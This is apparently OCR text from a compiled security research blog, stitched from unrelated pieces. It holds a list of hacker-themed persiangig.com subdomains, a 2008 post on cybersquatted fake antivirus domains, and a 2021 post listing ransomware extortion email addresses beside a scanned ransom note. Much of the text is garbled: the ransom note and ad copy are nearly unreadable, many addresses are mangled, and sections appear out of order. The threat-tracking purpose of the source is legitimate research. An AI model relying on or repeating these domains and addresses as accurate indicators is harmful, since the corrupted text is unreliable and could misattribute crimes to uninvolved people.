http://defaced.persiangig.com/ 
http://delsa.persiangig.com/ 
http://delta-hacker.persiangig.com/ 
http://destroyerh3ll.persiangig.com/ 
http://dialup-download.persiangig.com/ 
http://diazpamel10.persiangig.com/ 
http://dl1-security-network.persiangig.com/ 
http://dl4-downloadfa.persiangig.com/ 
http://dorsaazari.persiangig.com/ 
http://dostetdarammaa.persiangig.com/ 
http://dotaallstars.persiangig.com/ 
http://downloadestan5.persiangig.com/ 
http://dr-h4ck3r.persiangig.com/ 
http://dr-root.persiangig.com/ 
http://drduger.persiangig.com/ 
http://e3mail.persiangig.com/ 
http://ehsan6206.persiangig.com/ 
http://ekrami01.persiangig.com/ 
http://ekramil0.persiangig.com/ 
http://ekrami3.persiangig.com/ 
http://elyarz.persiangig.com/ 
http://erfxn.persiangig.com/ 
http://eshrag.persiangig.com/ 
http://esmaeilpoor.persiangig.com/ 
http://esmailapps.persiangig.com/ 
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http://esshop.persiangig.com/ 
http://far30tools.persiangig.com/ 
http://faraz4u.persiangig.com/ 
http://farhad242.persiangig.com/ 
http://faridmafia.persiangig.com/ 
http://fatalking.persiangig.com/ 
http://fazel-fbi.persiangig.com/ 
http://fazilamiry.persiangig.com/ 
http://fcbwin.persiangig.com/ 
http://fdownloadir.persiangig.com/ 
http://fghjjh.persiangig.com/ 
http://firebaxe.persiangig.com/ 
http://freelogo.persiangig.com/ 
http://frees.persiangig.com/ 
http://fun4ir.persiangig.com/ 
http://gOld-soft.persiangig.com/ 
http://g3n3rall-blackhat.persiangig.com/ 
http://galar2.persiangig.com/ 
http://galebsaz.persiangig.com/ 
http://game22009.persiangig.com/ 
http://gha3dak.persiangig.com/ 
http://ghalebkade.persiangig.com/ 
http://ghased2006.persiangig.com/ 
http://ghayegh-khali.persiangig.com/ 
http://gigmohsen.persiangig.com/ 
http://gikgik.persiangig.com/ 
http://gold-sOft.persiangig.com/ 
http://gold33.persiangig.com/ 
http://goord.persiangig.com/ 
http://groupsyahoo.persiangig.com/ 
http://gtaimages.persiangig.com/ 
http://h-team.persiangig.com/ 
http://h3xbO0yz.persiangig.com/ 
http://h4ck-tools. persiangig.com/ 
http://hacker.persiangig.com/ 
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http://nackeran99.persiangig.com/ 
http://nhackerashiyane.blogfa.com/ 
http://hadihadi.persiangig.com/ 
http://haftevigarl.persiangig.com/ 
http://hakaki.persiangig.com/ 
http://hakha.persiangig.com/ 
http://hali3eyyedh.persiangig.com/ 
http://naman313.persiangig.com/ 
http://hamed-qcc.persiangig.com/ 
http://hamedanno.persiangig.com/ 
http://hamedweb.persiangig.com/ 
http://hamid-xsky. persiangig.com/ 
http://hamidsari.persiangig.com/ 
http://hamidsos3.persiangig.com/ 
http://hamidvirusi.persiangig.com/ 
http://hamidzip.persiangig.com/ 
http://hamix2x.persiangig.com/ 
http://hck-tools.persiangig.com/ 
http://hcthemep.persiangig.com/ 
http://heavenly-boys.persiangig.com/ 
http://nebou.persiangig.com/ 
http://hellgate1.persiangig.com/ 
http://hesam4u.persiangig.com/ 
http://hfarchive.persiangig.com/ 
http://hivO000.persiangig.com/ 
http://hkingsoftware.persiangig.com/ 
http://hogwartsschool.persiangig.com/ 
http://nhomanmh95.persiangig.com/ 
http://www.homepage.ht/ 
http://honey24.persiangig.com/ 
http://hoseeinO.persiangig.com/ 
http://hotweb24.persiangig.com/ 
http://hunterprogs.persiangig.com/ 
http://iZ00ter.persiangig.com/ 
http://iman2sh.persiangig.com/ 
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http://imperial2008.persiangig.com/ 
http://impostor-76171.persiangig.com/ 
http://impostor.persiangig.com/ 
http://infohooman.persiangig.com/ 
http://infology2.persiangig.com/ 
http://iqbala.persiangig.com/ 
http://ir2hak.persiangig.com/ 
http://iran-hacker.persiangig.com/ 
http://iran-pc.persiangig.com/ 
http://iran30download.persiangig.com/ 
http://iranexe.persiangig.com/ 
http://irmessanger.persiangig.com/ 
http://irsdl.persiangig.com/ 
http://iscst.persiangig.com/ 
http://iseeu7.persiangig.com/ 
http://it-tab.persiangig.com/ 
http://jOOmjOOme.persiangig.com/ 
http://jaber.persiangig.com/ 
http://jahanseir.persiangig.com/ 
http://jasoo30.persiangig.com/ 
http://jovss.persiangig.com/ 
http://jetvpn.persiangig.com/ 
http://joker12.persiangig.com/ 
http://jsut2dl.persiangig.com/ 
http://juventus2020.persiangig.com/ 
http://k0242.persiangig.com/ 
http://kaave.persiangig.com/ 
http://kapakha3.persiangig.com/ 
http://karetbist. persiangig.com/ 
http://karim-sbs.persiangig.com/ 
http://katriana.persiangig.com/ 
http://kaveh0O817.persiangig.com/ 
http://kaziiak.persiangig.com/ 
http://keylogger.persiangig.com/ 
http://khafanpatogh.persiangig.com/ 
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http://khajavi0622.persiangig.com/ 
http://khashi.persiangig.com/ 
http://khI32.persiangig.com/ 
http://khosin.persiangig.com/ 
http://kiandew.persiangig.com/ 
http://kianescence.persiangig.com/ 
http://kiarashmm.persiangig.com/ 
http://kifabi.persiangig.com/ 
http://kingq8.persiangig.com/ 
http://kitten2.persiangig.com/ 
http://kohsalar.persiangig.com/ 
http://kolahsefid.persiangig.com/ 
http://kolx132.persiangig.com/ 
http://komil88.persiangig.com/ 
http://kookhneshinan.persiangig.com/ 
http://korosh-05.persiangig.com/ 
http://krylack.ultimate.keylogger.pro/ 
http://lOrdOfh3ll.persiangig.com/ 
http://lahij.persiangig.com/ 
http://lbclive.persiangig.com/ 
http://li-tex11.persiangig.com/ 
http://lightwolf.persiangig.com/ 
http://livesos.persiangig.com/ 
http://Inbmitnick.persiangig.com/ 
http://lord-pc.persiangig.com/ 
http://loveemperor.persiangig.com/ 
http://loving.persiangig.com/ 
http://m-nasr.persiangig.com/ 
http://m1998.persiangig.com/ 
http://m9macl.persiangig.com/ 
http://mahallatnews.persiangig.com/ 
http://mahallatonlinefiles.persiangig.com/ 
http://mahdi10.persiangig.com/ 
http://mahdi1l575.persiangig.com/ 
http://mahdiheidari.persiangig.com/ 
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4.3.15 Cybersquatting Security Vendors for Fraudulent Purposes (2008-03-21 00:02) 


Home | Download | Cus 


Q 


Virus Scan-2007 , 


Sorry, we do not ship outside North America 
We Highly recommend 


Panda Antivirus 2007 
> Inchudes Trufrevent™ Technologies with « heuristic 
ergne to etext unknown mabnere 
* Atomahcally Getects and eleninates all types of viruses 
* Keeps your PC free from spyware 


> E-mad and hard ash scammer 


> Protects against onkne fraud 


Just like the [1]creative typosquatting coming up with domain names [2]spoofing the structure 
of PayPal and Ebay’s web applications | covered in a previous post, this most recent example 
of c[3]ybersquatting is yet another example of how impersonating known and trusted brands 
can not only damage their reputation if the campaign’s not taken care of fast enough, but 
can also result in actual adware infection. Who’s getting targeted in this campaign? [4]Pan- 
daSecurity, [5]McAfee, Adobe Acrobat, and several other third party applications. It seems 
that IBSOFTWARE CYPRUS is keeping the entire domains portfolio undercover for the time 
being, with a great deal of these domains returning 403 forbidden messages. However, there 
are several domains that are actually serving the fake E-shops. This minimalistic approach 
on behalf of the malicious parties may have proved valuable if the domains were hosted on 
different IPs, however, they’re all hosted on a single IP. The type of "pay us and we'll point you 
to the download location" scheme applied here is a bit moronic, in fact the template nature of 
the E-shop does not know what healthy competition means as you can see in the screenshot 
above. Here are the domains themselves : 
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http://mahdiizadi.persiangig.com/ 
http://mahdiniknam.persiangig.com/ 
http://majid-138.persiangig.com/ 
http://majid0919.persiangig.com/ 
http://majidshirazy.persiangig.com/ 
http://makan.persiangig.com/ 
http://mamadnopm.persiangig.com/ 
http://mamalinternet.persiangig.com/ 
http://mammadcpu. persiangig.com/ 
http://marshal-doc.persiangig.com/ 
http://marvdasht.persiangig.com/ 
http://maryamsadeghi1372.persiangig.com/ 
http://masterdll.persiangig.com/ 
http://masterjoint.persiangig.com/ 
http://masterss.persiangig.com/ 
http://mayanet.persiangig.com/ 
http://mazaghine.persiangig.com/ 
http://mehd1.persiangig.com/ 
http://mehdi456.persiangig.com/ 
http://mehdibahadori.persiangig.com/ 
http://mehdioffflone.persiangig.com/ 
http://mehran4u.persiangig.com/ 
http://mellat.persiangig.com/ 
http://mhm5000.persiangig.com/ 
http://mihanp30.persiangig.com/ 
http://mihansystem.persiangig.com/ 
http://milad-gh.persiangig.com/ 
http://milad69.persiangig.com/ 
http://miladesfanji.persiangig.com/ 
http://milytexas.persiangig.com/ 
http://minasiyan.persiangig.com/ 
http://mintegaro.persiangig.com/ 
http://mionel.persiangig.com/ 
http://mj2008.persiangig.com/ 
http://moghi.persiangig.com/ 
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http://mohamadizadeh.persiangig.com/ 
http://mohammad-safari696.persiangig.com/ 
http://mohammad912.persiangig.com/ 
http://mohammadbonvari.persiangig.com/ 
http://mojinet.persiangig.com/ 
http://mojt3b3.persiangig.com/ 
http://mojtaba136.persiangig.com/ 
http://molex.persiangig.com/ 
http://moresecurity.persiangig.com/ 
http://mortalkombat.persiangig.com/ 
http://mortezahabibi.persiangig.com/ 
http://motakhases.persiangig.com/ 
http://mp4all.persiangig.com/ 
http://mpk2119.persiangig.com/ 
http://mraria.persiangig.com/ 
http://mrjack.persiangig.com/ 
http://mrpayne.persiangig.com/ 
http://msn-smith.persiangig.com/ 
http://mutemove.persiangig.com/ 
http://myways.persiangig.com/ 
http://nanorayane.persiangig.com/ 
http://narmafzar28.persiangig.com/ 
http://naserjan.persiangig.com/ 
http://navid-b-2012.persiangig.com/ 
http://nefratbooter.persiangig.com/ 
http://nemesis-0131.persiangig.com/ 
http://networktools.persiangig.com/ 
http://newblack.persiangig.com/ 
http://nima3.persiangig.com/ 
http://nimetal.persiangig.com/ 
http://noktehaa.persiangig.com/ 
http://noofoz.persiangig.com/ 
http://nova-team.persiangig.com/ 
http://omid-niazi.persiangig.com/ 
http://omid-pich.persiangig.com/ 
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http://omid-shakh.persiangig.com/ 
http://omid69.persiangig.com/ 
http://only-amniat.persiangig.com/ 
http://onlykdk.persiangig.com/ 
http://orum-0441.persiangig.com/ 
http://oshamid.persiangig.com/ 
http://p-h-s-t.persiangig.com/ 
http://p30cloob.persiangig.com/ 
http://p30man2008.persiangig.com/ 
http://p30shopcenter.persiangig.com/ 
http://p40-10.persiangig.com/ 
http://pack-blogfa-com.persiangig.com/ 
http://padad.persiangig.com/ 
http://paeez2012.persiangig.com/ 
http://pakota1000.persiangig.com/ 
http://paksal.persiangig.com/ 
http://panjsaher5.persiangig.com/ 
http://par30site.persiangig.com/ 
http://parandrayaneh.persiangig.com/ 
http://parazitwOrm.persiangig.com/ 
http://parsi.persiangig.com/ 
http://patoghma.persiangig.com/ 
http://payamjv.persiangig.com/ 
http://persianbackyard.persiangig.com/ 
http://persianfurom.persiangig.com/ 
http://persianhw.persiangig.com/ 
http://persiantnt. persiangig.com/ 
http://peymanjahanbakhsh.persiangig.com/ 
http://pichpichak-speed.persiangig.com/ 
http://pick-sub-ir.persiangig.com/ 
http://pishiman.persiangig.com/ 
http://pkmax.persiangig.com/ 
http://planetworld.persiangig.com/ 
http://omf0918.persiangig.com/ 
http://pnrbayati.persiangig.com/ 
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http://pooyanse2.persiangig.com/ 
http://port80.persiangig.com/ 
http://pouya2006.persiangig.com/ 
http://prime.persiangig.com/ 
http://prognet.persiangig.com/ 
http://programmers-9893.persiangig.com/ 
http://punisherr.persiangig.com/ 
http://pzr23.persiangig.com/ 
http://qwertyuiopasdfghjkl.persiangig.com/ 
http://ramin-rock.persiangig.com/ 
http://raminO.persiangig.com/ 
http://raminmj18.persiangig.com/ 
http://raperhal.persiangig.com/ 
http://rashterror.persiangig.com/ 
http://ravanbakhsh. persiangig.com/ 
http://rayanmehr.persiangig.com/ 
http://raykagorgani.persiangig.com/ 
http://rexona-dl.persiangig.com/ 
http://reza-eblicen.persiangig.com/ 
http://rezabs.persiangig.com/ 
http://rgb4you.persiangig.com/ 
http://rohullahalawi.persiangig.com/ 
http://rommy.persiangig.com/ 
http://rz04a.persiangig.com/ 
http://s3v3n.persiangig.com/ 
http://saber74.persiangig.com/ 
http://saeid70.persiangig.com/ 
http://sajjadkhafan.persiangig.com/ 
http://sakhi.persiangig.com/ 
http://saman034.persiangig.com/ 
http://samiragol.persiangig.com/ 
http://sarani0718.persiangig.com/ 
http://satan1.persiangig.com/ 
http://satanic.persiangig.com/ 
http://satanicboot.persiangig.com/ 
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http://scorpion2.persiangig.com/ 
http://sepidehdam.persiangig.com/ 
http://seyyedrasoul.persiangig.com/ 
http://sezar.persiangig.com/ 
http://sh3karchi.persiangig.com/ 
http://sh4dows-king.persiangig.com/ 
http://shamal.persiangig.com/ 
http://sheidaian.persianblog.ht/ 
http://sheikhoo.persiangig.com/ 
http://sidel32.persiangig.com/ 
http://sir4r4sh3rr0r.persiangig.com/ 
http://slate. persiangig.com/ 
http://softme.persiangig.com/ 
http://soltanhoseyn.persiangig.com/ 
http://someone.persiangig.com/ 
http://sonyeric.persiangig.com/ 
http://source-planet.persiangig.com/ 
http://spthapali.persiangig.com/ 
http://spyftp.persiangig.com/ 
http://sun2rise.persiangig.com/ 
http://system2009.persiangig.com/ 
http://t-danlod.persiangig.com/ 
http://tabriz118.persiangig.com/ 
http://takfanar.persiangig.com/ 
http://takp30them4.persiangig.com/ 


http://tanhadarshab2.persiangig.com/ 


http://tanhaeshgh71.persiangig.com/ 
http://tanhastrife.persiangig.com/ 
http://themist.persiangig.com/ 
http://torbat-h.persiangig.com/ 
http://tornado20.persiangig.com/ 
http://turkhackers.persiangig.com/ 
http://uh12uh12.persiangig.com/ 
http://under-world.persiangig.com/ 


http://unknOwn72.persiangig.com/ 
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http://upload-ekrami.persiangig.com/ 
http://upload2020.persiangig.com/ 
http://upload4u.persiangig.com/ 
http://uploadh.persiangig.com/ 
http://uploadr.persiangig.com/ 
http://urmiatheme. persiangig.com/ 
http://v4hid.persiangig.com/ 
http://vahid-master.persiangig.com/ 
http://vahidsistem.persiangig.com/ 
http://vobmahdi2009.persiangig.com/ 
http://vibox.persiangig.com/ 
http://www. virus45defacepage.ht/ 
http://vvolf.persiangig.com/ 
http://web-pc-training.persiangig.com/ 
http://xsky.persiangig.com/ 

Stay tuned! 


1. https://1.bp. blogspot .com/-y1lHaEQJKn-w/YCjkK_BFgLI/AAAAAAAALws/EG1tKGCKRMMmHx3PpNm34N8cV j FsSH5MQCLcBGASYHQ 
s1600/Misc_01.png 


17.2.7 Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses - Part Two (2021-02-16 13:49) 


[1] 


oi 


All your files have been encrypted! 


Ml your Mhes have been cacrypted Gee to a security prodtom with your PC. If pou want to restore Uhom, write us te the c mall wolantom dice eel com 
Write this 1D in the tithe of yowr seessumpe 

ba Case of to sorcerer in 24 Demers write us te therese © auntie: volantione Germ rede eue 

You have te pay for decryption m Bicoms The price Gapends om how taut you mete to we. Alber payment we wil send you the decryption teal that wd Gecrype al your Mes 


Feve deuryption as quarastce 
Betore paying you Gan send ws vo te 5 fies for fee Georyption, The total sae of fies asst be lve Dhan 20M (nom arctoved’), arf fies shoudl net Contan walsabte ptermanen. (databases Decne, Sgr excel Deets, enc ) 


Hews to obtain Bitcolm 
The cansest wary te buy become m Locailitcoms ste. You huwe te reguter, dick Buy becern’, and select the seller by payment method and price. 
ess nebtocrs comiay beso 
Ae you Can fend other places te Duy Btoers and begrners guide here 
Dene teen comdesh conyptormanor: ore Cart tuy becores! 


Mication! 
© Os met eemnarne enerystind fhes 
2 Ob mek hy te GecryEt you data uurg Ded party siftnure, Crary Cane permanent date lost 
« Decryeton ef your fles with the help of thud partes muny cause nonraned price (Wey add thew fee bp cur) oF you can Becemne 2 vetin of & scam. 
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Continuing the "[2]Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses" series including the original "[3]Exposing Pro- 
tonmail and Tutanota’s Illicit Abuse by Ransomware Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses" post I’ve decided to issue a second update to the origi- 
nal data set of currently active and circulating ransomware-themed emails currently circulating 
in the wild with the idea to assist U.S Law Enforcement and the security industry on its way to 
track down and prosecute the cybercriminals behind these campaigns. 


Currently active portfolio of currently active ransomware-themed email addresses currently 
in use: 


Milarepa.lotos@aol.com 
vengisto@firemail.cc 
vengisto@india.com 
nvengisto@firemail.cc 
nvengisto@india.com 
markuspeirrereal77@tutanota.com 
giomarkusnielson@tutanota.com 
markuspeirrereal77@protonmail.com 
mosteros@firemail.cc 
nmosteros@firemail.cc 
ngorentos@bitmessage.ch 
bufalo@firemail.cc 
nbufalo@firemail.cc 
TomLee240@aol.com 
hlper4y@tutanota.com 
helpdecrypt@msgsafe.io 
dable19@mail.fr 
decrypt@disroot.org 
decryptex@airmail.cc 
TomLee24@tuta.io 
hlper4y@cock.li 
airbusbtc@goat.si 
decryptex2@airmail.cc 
hupstore@keemail.me 
yaya _captain@aol.com 
yaya _captain999@india.com 
hupstore@protonmail.com 
hupstore@memeware.net 
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bepabepababy1@protonmail.com 
myphoto.jpg.bepabepababy1@protonmail.com 
moscownight123@airmail.cc 
BlackMajor@protonmail.com 
China.Helper@aol.com 
bucksbannyb@aol.com 
bucksbanny@mail.ee 
chinarecoverycompany@cock.li 
chinarecoverycompany@airmail.cc 
zetfile@protonmail.ch 
RestorFile@tutanota.com 
Citrteam@yahoo.com 
Citrteam@tutanota.com 
Citrteam@gmail.com 
FridaFarko@yahoo.com 
FridaFarko@aol.com 
FridaFarko@protonmail.com 
RestoreFile@protonmail.com 
RestoreFile@qq.com 
Benford333@criptext.com 
Benford333@protonmail.com 
Benford333@tutanota.com 
BobGreen85@criptext.com 
BobGreen85@aol.com 
BobGreen85@tutanota.com 
nobad@tutamail.com 
nobad@firemail.cc 
BatHelp@protonmail.com 
BatHelp@tutanota.com 
BatHelp@india.com 
easybackup@aol.com 
gooddecrypt@airmail.cc 
unlockfiles2021@cock.li 
helpisos@aol.com 

pewpew@ TuTa.io 

13680 


decryfiles2021@tutanota.com 
33postal@mail.fr 
8472host@cock.li 
SwOrdflsh@cock.|i 
Swordflsh@tutanota.com 
retrnyoufiles23@tutanota.com 
John32Dillinger@seznam.cz 
clyde.barrow15@tutanota.com 
55billy777@mail.fr 
legalrestore@tutanota.com 
kinddoctor@airmail.cc 
fishersam1188@tutanota.com 
iamcanhelpyou@tuta.io 
crazykillerusakk@hotmail.com 
encryptfull@criptext.com 
decryptfull@criptext.com 
Idecrypt.plz.dontworry@gmail.com 
idecrypt@mailfence.com 
God85Ar@yandex.com 
crazykillwel123@outlook.com 
price.decoding@tutanota.com 
price.decoding@aol.com 
legendencryptl1@criptext.com 
legendencrypt@criptext.com 
Hiden _pro@aol.com 

Hiden _pro@tutanota.com 
coinloby@gmail.com 
coinby@mailfence.com 
jorge.smith@mailfence.com 
finbdodscokpd@privatemail.com 
ssget@protonmail.com 

anon _bot666@protonmail.com 
niggapoopoo123@protonmail.com 
cryptolifeguard@tutanota.com 


cryptolifeguard@cock.li 
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zalton@tuta.io 
vulicapson@tuta.io 
vulicapson@cock.lu 
info@anti-spyware-101.com 
LLTP@mail2tor.com 
contatomaktub@email.tg 
info@bestsecuritysearch.com 
datarestorehelp@firemail.cc 
datahelp@iran.ir 
nhelpmanager@mail.ch 
nhelpmanager@airmail.cc 
bitcoinl43@india.com 
Merosa@india.com 
helpdatarestore@firemail.cc 
gorentos2@firemail.cc 
restorefiles@firemail.cc 
getbackmyfile@protonmail.com 
yourfiles1@cock.li 
Windows358@tuta.io 
decodevoid@gmail.com 
docodepepe@gmail.com 
qar48@tutanota.com 
unCrypte@outlook.com 
petersburgrecover@protonmail.com 
jacklee@airmail.cc 
jacklee73@mail.ua 
b1tcO1ln@aol.com 
decryptbox@airmail.cc 
Folieloi@protonmail.com 
Ctorsenoria@tutanota.com 
1.kazkavkovkiz@cock.li 
2.Hariliuios@tutanota.com 
lillysoft.it@gmail.com 
Fud@india.com 
Alex.vlasov@aol.com 
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Viruses, worrs, and Trojans heave evolved and multpied. Now they ae 
Geagned to infect without you notang. Antes 
Gotects and elrriwtes them to keep your PC rus tee. 


PandaSecurity - 
pandaantivirus2008.com 
panda-antivirus-2008.com 
pandasecurity2008.com 
pandaantivirus-2008.com 
panda-anti-virus.com 
panda-2008.com 
antivirus-panda-suite.com 
panda-ib.com 
panda-2008.com 
panda-anti-virus.com 
panda-antivirus-2007.com 
panda-antivirus-2008.net 
panda-bdl.com 
panda-ib.com 


“ICG the best and most correlate antiwrus 
vated.” 


- Seyware, Chale 
~ Fabe veus warnings and jokes sent to confused users 


(Goan up you PC and make it run faster and better than 
ever. Scan Geen into your Computer's hard dive to trd 

apd ebrwute the errors and bug: that can case your PC 
to fun dowly and maliunction. 


“We have Been adie to detect new threats ike 
Syware and elrnrate them torn ou computers.” 


Olan ~ Trenton, USA 
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Restore@protonmail.ch 
Catsexy@protonmail.com 
Guardware@india.com 
Systemdown@india.com 
Sos@anointernet.com 
Savepanda@india.com 
Help@decryptservice.info 
garryweber@protonmail.ch 
avastvirusinfo@yandex.com 
potentialenergy@mail.ru 
securityitl23@protonmail.com 
cavefat@tuta.io 
ripntfs@protonmail.com 
wecanhelpu@tuta.io 
tortoisesupport@protonmail.com 
bsbasim2017@gmail.com 
programmingmyst@gmail.com 
johnborn@cock.li 
jborn@tuta.io 
helper.china@aol.com 
VovanAndLexus@cock.|i 
neftet@tutanota.com 
EpsilonCrypt@tutanota.com 
codemanager@fastmail.fm 
repairmyfile@tormail.org 
antispam@cyberservices.com 
security11220@gmail.com 
bracodel7@gmail.com 
sec222555@gmail.com 
allhelpl16@gmail.com 
auinfol6@gmail.com 
helpasial6@gmail.com 
lathelp16@gmail.com 
brcodes16@gmail.com 


brcodes17@gmail.com 
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brcode2017@gmail.com 
brainfol7@gmail.com 
uscodes17@gmail.com 
eucodes17@gmail.com 
brbrcodes@gmail.com 
codescodes18@gmail.com 
cryptosupport@tormail.net 
blocksupport@tormail.net 
thel024rsa@i2pmail.org 
decrypting-files@yandex.ru 
decrypting@tormail.org 
blockage@tormail.org 
beryukov.mikuil@gmail.com 
torchwood0Q000@yandex.com 
torchwood@66.ru 
torchwood@riseup.net 
help@ausi.com 
sos@ausi.com 

anna _stepanova@aol.com 
backspace@riseup.net 
byaki buki@aol.com 
contact@casinomtgox.com 
evromaidan2014@aol.com 
Heinz@oath.com 
iizomer@aol.com 
kolobocheg@aol.com 
moshiax@aol.com 
numlock@2riseup.net 
numlock@riseup.net 
oduvansh@aol.com 
starpex@riseup.net 
ZANZIBAR@umpire.com 
vorjdSsa@mail.ru 
Opensupport@india.com 
supercrypt@mailer9.com 
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plaguel7@riseup.net 
xrtnhelp@yandex.ru 
silasw9pa@yahoo.co.uk 
decryptor171@mail2tor.com 
decryptor171@scramble.io 
filesO00001@gmail.com 
decode00001@gmail.com 
decode00002@gmail.com 
decode77777@gmail.com 
decode99999@gmail.com 
files640@gmail.com 
Ryabinina.Lina@gmail.com 
ViadimirScherbinin1991@gmail.com 
Lukyan.Sazonov26@gmail.com 
Novikov.Vavila@gmail.com 
selenadymond@gmail.com 
gervasiy.menyaev@gmail.com 
RobertaMacDonald1994@gmail.com 
pilotpilotO88@gmail.com 
europay@india.com 
fudx@lycos.com 

fud@lycos.com 
decode@india.com 
decrypt@india.com 
info@cryptedfiles. biz 
salutem@protonmail.com 
bingo@opensourcemail.org 
doctor@freelinuxmail.org 
johndoe@weekendwarrior55.com 
av666@weekendwarrior55.com 
email _info@cryptedfiles. biz 
emaill _info@cryptedfiles. biz 
milarepa.lotos@aol.com 
test.jpg.id-1235240425 help@decryptservice.info 
kiaracript@email.cz 
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kiaracript@gmail.com 
-kiaracript@gmail.com 
archive2010.zip.SN-6633475505259148-kiaracript@gmail.com 
archive2014.rar.SN-6633475505259148-kiaracript@gmail.com 
document2.txt.SN-6862051502902366-kiaracript@gmail.com 
y.volkova@i-jazz.ru 
kirova.|@mutualizm.ru 
kirova.ls@orangedv.tmweb.ru 
kirova-|@wibor5.ru 
abramova.|@wibor5.ru 
abramova@sabona.ru 
|_abramova@festivalps.ru 

| _abramova@wibor5.ru 
tox@sigaint.org 
theonewhoknocks6969@mailinator.com 
yagababushka@yahoo.com 
yaga.babushka@yahoo.com 
sociopatii@yahoo.com 

cagel@gmx.us 

datebatut@gmail.com 
datebatut@pochta.com 
davidblainemagique@gmail.com 
davidblaine@mail2world.com 
bitlockerlock.unlock@gmail.com 
comodosec@yandex.com 
comodosec@india.com 
vuyrk568gou@lelantos.org 
myqjsOl@gmail.com 
wowaanne@mail.ru 
viper1990@safe-mail.net 
keybtc@inbox.com 
mvplocksvc@yahoo.com 
xorthelp@yandex.ru 
trunhelp@yandex.ru 
helplovx@excite.co.jp 
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paycrypt@aol.com 
paycrypt@india.com 
-paycrypt@aol.com 
maliko@inbox.Iv 
locked@vistomail.com 
tuyuljahat@hotmail.com 
lyieg9eB@secmail.pro 
tikitakbum@rambler.ru 
thorntitinil979@danwin1210.me 
postal.surgut@danwin1210.me 
dizelmon@danwin1210.me 
eed8Aeta@danwin1210.me 
chaiRo7u@danwin1210.me 
eR8iech5@danwin1210.me 
Ux30e7ae@secmail.pro 
Xieth8ie@secmail.pro 
ghjujy@tuta.io 
Aeghie6u@secmail.pro 
rekoh4th@secmail.pro 
uroo7ohM@secmail.pro 
ivanmalahov@protonmail.com 
ooosferaplus@protonmail.com 
rusoftfond@protonmail.com 
andrey.taranov@protonmail.com 
g.kulahmet@protonmail.com 
g.kulahmet@secmail.pro 
soft.russian@protonmail.com 
soft.russian@secmail.pro 
mishacat@cock.li 
mishacat@secmail.pro 
bichkova@cock.li 
bichkova@secmail.pro 
trueransom@mail2tor.com 
momsbestfriend@protonmail.com 


torrenttracker@india.com 
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the.dodger@protonmail.com 
logical.disk@yandex.com 
windows.update@moscowmail.com 
decrypt.my.files@gmail.com 
lechiffre@india.com 
lechiffre@mailchuck.com 
lechiffre@firemail.cc 
crydhellsek@gmail.com 
cryphelp963@gmail.com 
helpsend369@gmail.com 
panerai794@gmail.com 
prosschiff@gmail.com 
7399@sigaint.org 
flsunlocker@yahoo.com 
abennaki@india.com 
transcript@india.com 
deszyfrator.deszyfr@yandex.ru 
maya _157 _ransom@hotmail.com 
bhacks740@gmail.com 
jOra@protonmail.com 
sp0Of3rsuppOrt@protonmail.com 
banetnatia@mail.com 

Kharpov _igor@mail.com 
matusik11@techemail.com 
megrela777@gmail.com 
rayankirr@gmail.com 
ryanqw31@gmail.com 

Sarah G@ausi.com 
smartfiles9@yandex.com 
unransom@me.com 
nown@ruggedinbox.com 
motox2016@mail2tor.com 
fantomd12@yandex.ru 
fantom12@techemail.com 
restorefiles@protonmail.ch 
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fixfiles@protonmail.ch 
61f1e8055af3f6a672959e6b0493a2@gmail.com 
cstddetnkvcmknI@gmail.com 
decryptioncompany@inbox.ru 
fabianwosar@inbox.ru 
cryptservice@inbox.ru 
cryptsvc@mail.ru 
cryptservice@jabber.ua 
crypt64@mail.ru 
crypt32@jabber.ua 
crypt32@mail.ru 
kevinrobinson@inbox.ru 
decryptgroup@inbox.ru 
decryptgroup@india.com 
decryptgroup@xmpp.jp 
cryptsvc@securejabber.me 
shellexec@protonmail.com 
null _ptr@tutanota.de 

one _weajJc@rows.io 

rep stosd@protonmail.com 
rep stosd@tuta.io 
youneedmail@protonmail.com 
youneedmail@bitmai.la 
youneedhelp@mail2tor.com 
support4you@protonmail.com 
esmeraldaencryption@mail.ru 
deposithere@e-mail.ph 
sp02@protonmail.com 
devilguy666@protonmail.com 
devilguy@sigaint.org 
ea345@sigaint.org 
dj.elton@hotmail.co.uk 
john.perezzka@gmail.com 
lambing.watson@gail.com 
bitcoin666@cock.|i 
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apOcalypse@india.com 
adaline.lowell.85@mail.ru 
rozlok@protonmail.com 
t_tasty@aol.com 
pulpy2@cock.li 
pulpy@protonmail.ch 
pulpy@cock.li 

dexp@cock.li 
stopfilesrestore@bitmessage.ch 
stopfilesrestore@india.com 
suspendedfiles@bitmessage.ch 
suspendedfiles@india.com 
waiting@bitmessage.ch 
waiting@india.com 
pausa@bitmessage.ch 
pausa@india.com 
decryption@bitmessage.ch 
decryption@india.com 
decryptiondata@bitmessage.ch 
decryptiondata@india.com 
datadecryption@bitmessage.ch 
datadecryption@india.com 
keypass@bitmessage.ch 
keypass@india.com 
BM-2cUMY51WfNRG8jGrWcMzTASeUGX84yX741@bitmessage.ch 
keypassdecrypt@india.com 
decryptionwhy@india.com 
BM-2cUmM1HG5NFf9fYMhPzLhjoBdxXqde26iBm2@bitmessage.ch 
BM-2cXonzj9ovn5qdX2MrwMK4j3qCquXBko4h@bitmessage.ch 
savefiles@india.com 
pumarestore@india.com 
helpshadow@india.com 
helpshadow@firemail.cc 
restoredjvu@india.com 
restoredjvu@firemail.cc 
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pdfhelp@india.com 
pdfhelp@firemail.cc 
blower@india.com 
blower@firemail.cc 
merosa@firemail.cc 
merosadecryption@gmail.com 
stoneland@firemail.cc 
gorentos@firemail.cc 
ferast@firemail.cc 
gerentoshelp@firemail.cc 
gerentosrestore@firemail.cc 
amundas@firemail.cc 
salesrestoresoftware@firemail.cc 
salesrestoresoftware@gmail.com 
restoredatahelp@firemail.cc 
restoring sup@india.com 
restoring sup@computer4u.com 
restoring reserve@india.com 
zipper@email.tg 
andresaha82@gmail.com 
viastnou.hlavou@mailfence.com 
random _anonymous@gmail.com 
crannbest@foxmail.com 
lanran-decrypter@list.ru 
tom.anderson@india.com 

DE coDER@mail2tor.com 
scryptx@meta.ua 
robert.swat@gqip.ru 
helppme@india.com 
hep!l1112@aol.com 
some@mail.ru 

ziz777@gmx.com 
ziz777@india.com 
ursa2277@gmx.com 


ursa2277@yahoo.com 
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ursa2277@india.com 
ursa2277@bk.ru 
alexjer554@gmx.com 
alexjer554@india.com 
batary5588@gmx.com 
batary5588@india.com 
batary5588@protonmail.com 
